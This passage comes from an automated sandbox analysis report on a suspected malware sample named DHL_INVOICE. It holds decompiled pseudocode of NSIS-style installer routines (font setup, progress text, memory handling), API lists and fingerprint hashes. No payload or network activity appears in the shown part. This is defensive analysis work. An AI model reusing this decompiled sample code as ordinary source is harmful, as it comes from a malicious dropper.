                                                                            				ReleaseDC(_a24, _t29);
                                                                            				_t13 = E00403002(3);
                                                                            				_t26 = _a48;
                                                                            				_push(_a36);
                                                                            				 *0x40d918 = _t13;
                                                                            				 *0x40d91f = 1;
                                                                            				 *0x40d91c = _t26 & 0x00000001;
                                                                            				_push("Calibri");
                                                                            				 *0x40d91d = _t26 & 0x00000002;
                                                                            				 *0x40d91e = _t26 & 0x00000004;
                                                                            				E00405EBA();
                                                                            				_push(CreateFontIndirectW(0x40d908));
                                                                            				_push(_a8);
                                                                            				E0040661F();
                                                                            				_t22 =  *((intOrPtr*)(_t35 + 0x10));
                                                                            				 *0x435ac8 =  *0x435ac8 + _t22;
                                                                            				return 0;
                                                                            			}










                                                                            0x00401fc1
                                                                            0x00401fc3
                                                                            0x00401fe0
                                                                            0x00401feb
                                                                            0x00401ff3
                                                                            0x00401ff9
                                                                            0x00401ffd
                                                                            0x00402001
                                                                            0x0040200a
                                                                            0x00402011
                                                                            0x0040201d
                                                                            0x00402022
                                                                            0x00402027
                                                                            0x0040202d
                                                                            0x00402041
                                                                            0x00402042
                                                                            0x004016b7
                                                                            0x00402ea1
                                                                            0x00402ea5
                                                                            0x00402eb7

                                                                            APIs
                                                                            • GetDC.USER32 ref: 00401FB9
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401FD0
                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401FD8
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401FEB
                                                                              • Part of subcall function 00405EBA: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406070
                                                                            • CreateFontIndirectW.GDI32(0040D908), ref: 00402037
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectReleaselstrcat
                                                                            • String ID: Calibri
                                                                            • API String ID: 4253744674-1409258342
                                                                            • Opcode ID: 68512fbf4ac7801365b5f78afe65c0e513a631e9eafc47c317fc045465379f25
                                                                            • Instruction ID: 19ee21ee25b481e0e115610c7b0d21c914cbbc44bdafb393b7f83238122b1e8a
                                                                            • Opcode Fuzzy Hash: 68512fbf4ac7801365b5f78afe65c0e513a631e9eafc47c317fc045465379f25
                                                                            • Instruction Fuzzy Hash: 4B01D4B6905340AFD300AFB4AD0AB563FA8ABA9705F10483DF641B71E2C6784709CB2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0040364F(struct HWND__* _a4, intOrPtr _a8) {
                                                                            				short _v132;
                                                                            				int _t18;
                                                                            
                                                                            				if(_a8 != 0x110) {
                                                                            					if(_a8 == 0x113) {
                                                                            						goto L3;
                                                                            					}
                                                                            				} else {
                                                                            					SetTimer(_a4, 1, 0xfa, 0);
                                                                            					L3:
                                                                            					_t18 =  *0x40d968; // 0x9caa0
                                                                            					_t19 =  <  ?  *0x40d96c : _t18;
                                                                            					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv( <  ?  *0x40d96c : _t18, 0x64, _t18));
                                                                            					SetWindowTextW(_a4,  &_v132);
                                                                            					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                                                            				}
                                                                            				return 0;
                                                                            			}





                                                                            0x0040365f
                                                                            0x0040367c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403661
                                                                            0x0040366d
                                                                            0x0040367e
                                                                            0x0040367e
                                                                            0x0040368b
                                                                            0x004036a5
                                                                            0x004036b5
                                                                            0x004036c7
                                                                            0x004036c7
                                                                            0x004036cf

                                                                            APIs
                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040366D
                                                                            • MulDiv.KERNEL32(0009CAA0,00000064,0009CAA0), ref: 00403695
                                                                            • wsprintfW.USER32 ref: 004036A5
                                                                            • SetWindowTextW.USER32(?,?), ref: 004036B5
                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 004036C7
                                                                            Strings
                                                                            • verifying installer: %d%%, xrefs: 0040369F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: verifying installer: %d%%
                                                                            • API String ID: 1451636040-82062127
                                                                            • Opcode ID: 7999ebd0115e22dc8382da0543a4734c08260491a853317dea2dbb1df602252a
                                                                            • Instruction ID: 5c883eac817cb3b9f0e850005900bd2bca04ae763b88d1ec11a0ecb90196ae4f
                                                                            • Opcode Fuzzy Hash: 7999ebd0115e22dc8382da0543a4734c08260491a853317dea2dbb1df602252a
                                                                            • Instruction Fuzzy Hash: 87013671940209BBDF249FA0DD49FAA3B78A700705F008439F606B51E1DBB59A55CF59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 69%
                                                                            			E6F1C2209(intOrPtr* _a4) {
                                                                            				intOrPtr* _t23;
                                                                            				signed int _t24;
                                                                            				intOrPtr _t25;
                                                                            				intOrPtr _t33;
                                                                            				void* _t39;
                                                                            				void* _t42;
                                                                            
                                                                            				_t39 = E6F1C12F8();
                                                                            				_t23 = _a4;
                                                                            				_t33 =  *((intOrPtr*)(_t23 + 0x1014));
                                                                            				_t42 = (_t33 + 0x81 << 5) + _t23;
                                                                            				do {
                                                                            					if( *((intOrPtr*)(_t42 - 4)) >= 0) {
                                                                            					}
                                                                            					_t24 =  *(_t42 - 8) & 0x000000ff;
                                                                            					if(_t24 <= 7) {
                                                                            						switch( *((intOrPtr*)(_t24 * 4 +  &M6F1C2331))) {
                                                                            							case 0:
                                                                            								 *_t39 = 0;
                                                                            								goto L17;
                                                                            							case 1:
                                                                            								__edx =  *__edx;
                                                                            								if(__ecx > 0) {
                                                                            									__ecx = __ecx - 1;
                                                                            									__ecx = __ecx *  *(0x6f1c4064 + __eax * 4);
                                                                            									asm("sbb eax, eax");
                                                                            									__edx = __edx &  *(0x6f1c4084 + __eax * 4);
                                                                            								}
                                                                            								_push(__edx);
                                                                            								goto L15;
                                                                            							case 2:
                                                                            								_push(__edi);
                                                                            								_push(__edx[1]);
                                                                            								_push( *__edx);
                                                                            								__eax = E6F1C149E(__ecx);
                                                                            								goto L16;
                                                                            							case 3:
                                                                            								__ecx =  *0x6f1c5040;
                                                                            								__ecx - 1 = MultiByteToWideChar(0, 0,  *__edx, __ecx, __edi, __ecx - 1);
                                                                            								__eax =  *0x6f1c5040;
                                                                            								__ecx = 0;
                                                                            								 *((short*)(__edi + __eax * 2 - 2)) = __cx;
                                                                            								goto L17;
                                                                            							case 4:
                                                                            								__eax = lstrcpynW(__edi,  *__edx,  *0x6f1c5040);
                                                                            								goto L17;
                                                                            							case 5:
                                                                            								_push( *0x6f1c5040);
                                                                            								_push(__edi);
                                                                            								_push( *__edx);
                                                                            								__imp__StringFromGUID2();
                                                                            								goto L17;
                                                                            							case 6:
                                                                            								_push( *__esi);
                                                                            								L15:
                                                                            								__eax = wsprintfW(__edi, 0x6f1c4058);
                                                                            								L16:
                                                                            								__esp = __esp + 0xc;
                                                                            								goto L17;
                                                                            						}
                                                                            					}
                                                                            					L17:
                                                                            					if( *(_t42 + 0x14) != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t42 - 4)) > 0)) {
                                                                            						GlobalFree( *(_t42 + 0x14));
                                                                            					}
                                                                            					_t25 =  *((intOrPtr*)(_t42 + 0xc));
                                                                            					if(_t25 != 0) {
                                                                            						if(_t25 != 0xffffffff) {
                                                                            							if(_t25 > 0) {
                                                                            								E6F1C1638(_t25 - 1, _t39);
                                                                            								goto L26;
                                                                            							}
                                                                            						} else {
                                                                            							E6F1C15EB(_t39);
                                                                            							L26:
                                                                            						}
                                                                            					}
                                                                            					_t42 = _t42 - 0x20;
                                                                            					_t33 = _t33 - 1;
                                                                            				} while (_t33 >= 0);
                                                                            				return GlobalFree(_t39);
                                                                            			}









                                                                            0x6f1c2211
                                                                            0x6f1c2213
                                                                            0x6f1c2217
                                                                            0x6f1c2226
                                                                            0x6f1c2228
                                                                            0x6f1c222d
                                                                            0x6f1c222d
                                                                            0x6f1c2235
                                                                            0x6f1c223c
                                                                            0x6f1c2242
                                                                            0x00000000
                                                                            0x6f1c224b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2253
                                                                            0x6f1c2257
                                                                            0x6f1c2259
                                                                            0x6f1c225a
                                                                            0x6f1c2265
                                                                            0x6f1c2269
                                                                            0x6f1c2269
                                                                            0x6f1c2270
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2273
                                                                            0x6f1c2274
                                                                            0x6f1c2277
                                                                            0x6f1c2279
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2280
                                                                            0x6f1c2292
                                                                            0x6f1c2298
                                                                            0x6f1c229d
                                                                            0x6f1c229f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c22c0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c22a6
                                                                            0x6f1c22ac
                                                                            0x6f1c22ad
                                                                            0x6f1c22af
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c22c8
                                                                            0x6f1c22ca
                                                                            0x6f1c22d0
                                                                            0x6f1c22d6
                                                                            0x6f1c22d6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x6f1c2242
                                                                            0x6f1c22d9
                                                                            0x6f1c22dd
                                                                            0x6f1c22f1
                                                                            0x6f1c22f1
                                                                            0x6f1c22f7
                                                                            0x6f1c22fc
                                                                            0x6f1c2301
                                                                            0x6f1c230d
                                                                            0x6f1c2312
                                                                            0x00000000
                                                                            0x6f1c2317
                                                                            0x6f1c2303
                                                                            0x6f1c2304
                                                                            0x6f1c2318
                                                                            0x6f1c2318
                                                                            0x6f1c2301
                                                                            0x6f1c2319
                                                                            0x6f1c231c
                                                                            0x6f1c231c
                                                                            0x6f1c232f

                                                                            APIs
                                                                              • Part of subcall function 6F1C12F8: GlobalAlloc.KERNEL32(00000040,?,6F1C11C4,-000000A0), ref: 6F1C1302
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6F1C22F1
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6F1C2326
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1131982632.000000006F1C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F1C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1131958154.000000006F1C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1132018644.000000006F1C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1132042620.000000006F1C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6f1c0000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: a8ee2ae2639d159ac37d01cba5b86caaba1512476aeb266bfcfa78981eebe178
                                                                            • Instruction ID: 042b2fb8d71c81af78146caae742970add0e923817647ef1aca0d576c2e582e9
                                                                            • Opcode Fuzzy Hash: a8ee2ae2639d159ac37d01cba5b86caaba1512476aeb266bfcfa78981eebe178
                                                                            • Instruction Fuzzy Hash: D3310431148281DBDB158F68C944EAA7BB4FF6A7A5F0211ADF401D6190C73EA470DB63
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E6F1C10C7(void* _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
                                                                            				signed int _v0;
                                                                            				signed int _t31;
                                                                            				void* _t32;
                                                                            				signed int _t34;
                                                                            				void* _t39;
                                                                            				void* _t46;
                                                                            				intOrPtr _t55;
                                                                            				void* _t59;
                                                                            				void* _t66;
                                                                            				void* _t67;
                                                                            				signed short _t70;
                                                                            				void* _t71;
                                                                            				void* _t78;
                                                                            				signed short _t79;
                                                                            				void* _t83;
                                                                            				void* _t85;
                                                                            				void* _t86;
                                                                            				void* _t88;
                                                                            				signed int _t89;
                                                                            				void* _t91;
                                                                            				void _t94;
                                                                            				void _t95;
                                                                            				void* _t96;
                                                                            				void* _t98;
                                                                            				void* _t100;
                                                                            
                                                                            				 *0x6f1c5040 = _a8;
                                                                            				 *0x6f1c503c = _a16;
                                                                            				 *0x6f1c5038 = _a12;
                                                                            				 *((intOrPtr*)(_a20 + 0xc))( *0x6f1c5014, E6F1C132B, _t85, _t88);
                                                                            				_t89 =  *0x6f1c5040 * 0x28;
                                                                            				_v0 = _t89;
                                                                            				_t96 = E6F1C1593();
                                                                            				_a8 = _t96;
                                                                            				_t86 = _t96;
                                                                            				_t70 = _v0 & 0x0000ffff;
                                                                            				if(_t70 != 0) {
                                                                            					_t83 = 0xa;
                                                                            					do {
                                                                            						_t31 = _t70 & 0x0000ffff;
                                                                            						_t86 = _t86 + 2;
                                                                            						_t100 = _t31 - 0x66;
                                                                            						if(_t100 > 0) {
                                                                            							_t32 = _t31 - 0x6c;
                                                                            							if(_t32 == 0) {
                                                                            								goto L24;
                                                                            							} else {
                                                                            								_t39 = _t32 - 4;
                                                                            								if(_t39 == 0) {
                                                                            									goto L13;
                                                                            								} else {
                                                                            									_t46 = _t39;
                                                                            									if(_t46 == 0) {
                                                                            										goto L11;
                                                                            									} else {
                                                                            										goto L8;
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            						} else {
                                                                            							if(_t100 == 0) {
                                                                            								_t78 =  *0x6f1c503c;
                                                                            								_t91 =  *_t78;
                                                                            								 *_t78 =  *_t91;
                                                                            								_t79 = _v0;
                                                                            								_t55 =  *((intOrPtr*)(_t79 + 0xc));
                                                                            								_a12 = _t55;
                                                                            								if( *((intOrPtr*)(_t91 + 4)) == 0x2691) {
                                                                            									E6F1C132E(_t79, _t91 + 8, 0x38);
                                                                            									_t79 = _v0;
                                                                            									_t98 = _t98 + 0xc;
                                                                            									_t55 = _a12;
                                                                            								}
                                                                            								 *((intOrPtr*)(_t79 + 0xc)) = _t55;
                                                                            								GlobalFree(_t91);
                                                                            								goto L16;
                                                                            							} else {
                                                                            								_t59 = _t31 - 0x46;
                                                                            								if(_t59 == 0) {
                                                                            									_t95 = GlobalAlloc(0x40, 8 +  *0x6f1c5040 * 2);
                                                                            									 *((intOrPtr*)(_t95 + 4)) = 0x2691;
                                                                            									_t15 = _t95 + 8; // 0x8
                                                                            									E6F1C132E(_t15, _v0, 0x38);
                                                                            									 *_t95 =  *( *0x6f1c503c);
                                                                            									 *( *0x6f1c503c) = _t95;
                                                                            									goto L15;
                                                                            								} else {
                                                                            									_t66 = _t59 - 6;
                                                                            									if(_t66 == 0) {
                                                                            										L24:
                                                                            										_t33 =  *0x6f1c5010;
                                                                            										if( *0x6f1c5010 != 0) {
                                                                            											E6F1C132E( *0x6f1c5038, _t33 + 4, _t89);
                                                                            											_t71 =  *0x6f1c5010;
                                                                            											_t98 = _t98 + 0xc;
                                                                            											 *0x6f1c5010 =  *_t71;
                                                                            											GlobalFree(_t71);
                                                                            											goto L26;
                                                                            										}
                                                                            									} else {
                                                                            										_t67 = _t66 - 4;
                                                                            										if(_t67 == 0) {
                                                                            											 *_t86 =  *_t86 + _t83;
                                                                            											L13:
                                                                            											GlobalFree(E6F1C15EB(E6F1C1548(( *_t86 & 0x0000ffff) - 0x30)));
                                                                            											_t86 = _t86 + 2;
                                                                            											goto L26;
                                                                            										} else {
                                                                            											_t46 = _t67;
                                                                            											if(_t46 == 0) {
                                                                            												 *_t86 =  *_t86 + _t83;
                                                                            												L11:
                                                                            												GlobalFree(E6F1C1638(( *_t86 & 0x0000ffff) - 0x30, E6F1C1593()));
                                                                            												_t86 = _t86 + 2;
                                                                            												goto L16;
                                                                            											} else {
                                                                            												L8:
                                                                            												if(_t46 == 1) {
                                                                            													_t94 = GlobalAlloc(0x40, _t89 + 4);
                                                                            													_t11 = _t94 + 4; // 0x4
                                                                            													E6F1C132E(_t11,  *0x6f1c5038, _v0);
                                                                            													 *_t94 =  *0x6f1c5010;
                                                                            													 *0x6f1c5010 = _t94;
                                                                            													L15:
                                                                            													_t98 = _t98 + 0xc;
                                                                            													L16:
                                                                            													_t89 = _v0;
                                                                            													L26:
                                                                            													_t83 = 0xa;
                                                                            												}
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						_t34 =  *_t86 & 0x0000ffff;
                                                                            						_t70 = _t34;
                                                                            					} while (_t34 != 0);
                                                                            					_t96 = _a8;
                                                                            				}
                                                                            				return GlobalFree(_t96);
                                                                            			}




























                                                                            0x6f1c10cd
                                                                            0x6f1c10d7
                                                                            0x6f1c10e1
                                                                            0x6f1c10f5
                                                                            0x6f1c10f8
                                                                            0x6f1c10ff
                                                                            0x6f1c110e
                                                                            0x6f1c1110
                                                                            0x6f1c1114
                                                                            0x6f1c1116
                                                                            0x6f1c111d
                                                                            0x6f1c1129
                                                                            0x6f1c112a
                                                                            0x6f1c112a
                                                                            0x6f1c112d
                                                                            0x6f1c1130
                                                                            0x6f1c1133
                                                                            0x6f1c1260
                                                                            0x6f1c1263
                                                                            0x00000000
                                                                            0x6f1c1265
                                                                            0x6f1c1265
                                                                            0x6f1c1268
                                                                            0x00000000
                                                                            0x6f1c126e
                                                                            0x6f1c126f
                                                                            0x6f1c1272
                                                                            0x00000000
                                                                            0x6f1c1278
                                                                            0x00000000
                                                                            0x6f1c1278
                                                                            0x6f1c1272
                                                                            0x6f1c1268
                                                                            0x6f1c1139
                                                                            0x6f1c1139
                                                                            0x6f1c1221
                                                                            0x6f1c122c
                                                                            0x6f1c1230
                                                                            0x6f1c1232
                                                                            0x6f1c1235
                                                                            0x6f1c1238
                                                                            0x6f1c1240
                                                                            0x6f1c1249
                                                                            0x6f1c124e
                                                                            0x6f1c1251
                                                                            0x6f1c1254
                                                                            0x6f1c1254
                                                                            0x6f1c1259
                                                                            0x6f1c125c
                                                                            0x00000000
                                                                            0x6f1c113f
                                                                            0x6f1c113f
                                                                            0x6f1c1142
                                                                            0x6f1c11ec
                                                                            0x6f1c11f5
                                                                            0x6f1c11f8
                                                                            0x6f1c11ff
                                                                            0x6f1c120c
                                                                            0x6f1c1213
                                                                            0x00000000
                                                                            0x6f1c1148
                                                                            0x6f1c1148
                                                                            0x6f1c114b
                                                                            0x6f1c127d
                                                                            0x6f1c127d
                                                                            0x6f1c1284
                                                                            0x6f1c1291
                                                                            0x6f1c1296
                                                                            0x6f1c129c
                                                                            0x6f1c12a2
                                                                            0x6f1c12a7
                                                                            0x00000000
                                                                            0x6f1c12a7
                                                                            0x6f1c1151
                                                                            0x6f1c1151
                                                                            0x6f1c1154
                                                                            0x6f1c11b5
                                                                            0x6f1c11b8
                                                                            0x6f1c11cd
                                                                            0x6f1c11cf
                                                                            0x00000000
                                                                            0x6f1c1156
                                                                            0x6f1c1157
                                                                            0x6f1c115a
                                                                            0x6f1c1196
                                                                            0x6f1c1199
                                                                            0x6f1c11ae
                                                                            0x6f1c11b0
                                                                            0x00000000
                                                                            0x6f1c115c
                                                                            0x6f1c115c
                                                                            0x6f1c115f
                                                                            0x6f1c1175
                                                                            0x6f1c117d
                                                                            0x6f1c1181
                                                                            0x6f1c118c
                                                                            0x6f1c118e
                                                                            0x6f1c1215
                                                                            0x6f1c1215
                                                                            0x6f1c1218
                                                                            0x6f1c1218
                                                                            0x6f1c12a9
                                                                            0x6f1c12ab
                                                                            0x6f1c12ab
                                                                            0x6f1c115f
                                                                            0x6f1c115a
                                                                            0x6f1c1154
                                                                            0x6f1c114b
                                                                            0x6f1c1142
                                                                            0x6f1c1139
                                                                            0x6f1c12ac
                                                                            0x6f1c12af
                                                                            0x6f1c12b1
                                                                            0x6f1c12ba
                                                                            0x6f1c12ba
                                                                            0x6f1c12c5

                                                                            APIs
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 6F1C116B
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6F1C11AE
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6F1C11CD
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 6F1C11E6
                                                                            • GlobalFree.KERNEL32 ref: 6F1C125C
                                                                            • GlobalFree.KERNEL32(?), ref: 6F1C12A7
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6F1C12BF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1131982632.000000006F1C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F1C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1131958154.000000006F1C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1132018644.000000006F1C4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1132042620.000000006F1C6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6f1c0000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: 3a1d0b09305bfade54448fcc8332e1013a90c9d836730f7c9caba7fddee3f5da
                                                                            • Instruction ID: 79cbbff8fd1ecb12580677b8255b718d5e56ba8a015414200fe3c094625af16d
                                                                            • Opcode Fuzzy Hash: 3a1d0b09305bfade54448fcc8332e1013a90c9d836730f7c9caba7fddee3f5da
                                                                            • Instruction Fuzzy Hash: A051BF755807019BCB10CFB8C840A6A7BE4FF6A7A4B11456EF944E7290D73EE930CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 63%
                                                                            			E00405560(signed int __ecx, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                            				int _v12;
                                                                            				char _v80;
                                                                            				char _v136;
                                                                            				signed int _t23;
                                                                            				void* _t26;
                                                                            				void* _t34;
                                                                            				void* _t43;
                                                                            				signed char _t45;
                                                                            				signed int _t46;
                                                                            				signed char _t50;
                                                                            				signed int _t51;
                                                                            				signed int _t53;
                                                                            				signed int _t54;
                                                                            				void* _t59;
                                                                            				signed int _t61;
                                                                            				signed int _t63;
                                                                            
                                                                            				_t23 = _a16;
                                                                            				_t59 = 0xffffffdc;
                                                                            				if(_t23 == 0) {
                                                                            					_t54 = _a12;
                                                                            					_t61 = _t54;
                                                                            					asm("sbb ecx, ecx");
                                                                            					_t43 = 0x14;
                                                                            					asm("sbb eax, eax");
                                                                            					_t26 = 0xffffffde;
                                                                            					_t59 =  <  ? _t26 : _t59 +  ~0x100000;
                                                                            					_t45 =  >=  ? (__ecx & 0xfffffff6) + _t43 : 0;
                                                                            					if(_t61 < 0xffff3333) {
                                                                            						asm("cdq");
                                                                            						_t53 = 0x14;
                                                                            						_t54 = _t61 + 1 / _t53;
                                                                            					}
                                                                            					_t50 = _t45;
                                                                            					_t63 = _t54 >> _t50;
                                                                            					_t51 = 0xa;
                                                                            					_t46 = ((_t54 & 0x00ffffff) * 0xa >> _t50) % _t51;
                                                                            				} else {
                                                                            					_t63 = (_t23 << 0x00000020 | _a12) >> 0x14;
                                                                            					_t46 = 0;
                                                                            				}
                                                                            				_push(_a8);
                                                                            				_push(0x42bd48);
                                                                            				E00405EBA();
                                                                            				_push(0xffffffdf);
                                                                            				_push( &_v136);
                                                                            				_push(E00405EBA());
                                                                            				_push(_t59);
                                                                            				_t34 = E00405EBA();
                                                                            				wsprintfW( &(0x42bd48[lstrlenW(0x42bd48)]), L"%u.%u%s%s", _t63, _t46, _t34,  &_v80);
                                                                            				return SetDlgItemTextW( *0x4349dc, _v12, 0x42bd48);
                                                                            			}



















                                                                            0x00405560
                                                                            0x00405570
                                                                            0x00405573
                                                                            0x00405584
                                                                            0x00405590
                                                                            0x0040559b
                                                                            0x004055a0
                                                                            0x004055a7
                                                                            0x004055af
                                                                            0x004055b0
                                                                            0x004055b7
                                                                            0x004055c0
                                                                            0x004055cb
                                                                            0x004055cc
                                                                            0x004055cf
                                                                            0x004055cf
                                                                            0x004055d4
                                                                            0x004055dc
                                                                            0x004055e7
                                                                            0x004055ea
                                                                            0x00405575
                                                                            0x0040557c
                                                                            0x00405580
                                                                            0x00405580
                                                                            0x004055ec
                                                                            0x004055f8
                                                                            0x004055f9
                                                                            0x004055fe
                                                                            0x00405604
                                                                            0x0040560a
                                                                            0x0040560b
                                                                            0x00405611
                                                                            0x0040562c
                                                                            0x00405652

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(Somatopleural Setup: Installing,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF,Somatopleural Setup: Installing,?,?,?,?,?), ref: 0040561F
                                                                            • wsprintfW.USER32 ref: 0040562C
                                                                            • SetDlgItemTextW.USER32(?,Somatopleural Setup: Installing), ref: 00405643
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                            • String ID: %u.%u%s%s$Somatopleural Setup: Installing
                                                                            • API String ID: 3540041739-1782000458
                                                                            • Opcode ID: b3da9a1244fcee535f9463e31d5d6ec72300bd819393bad9935e8733ca876ae6
                                                                            • Instruction ID: ddca7360d09b2edd05df8fb08f039e75c7842db061d31d06a5ac0fb1d0c25846
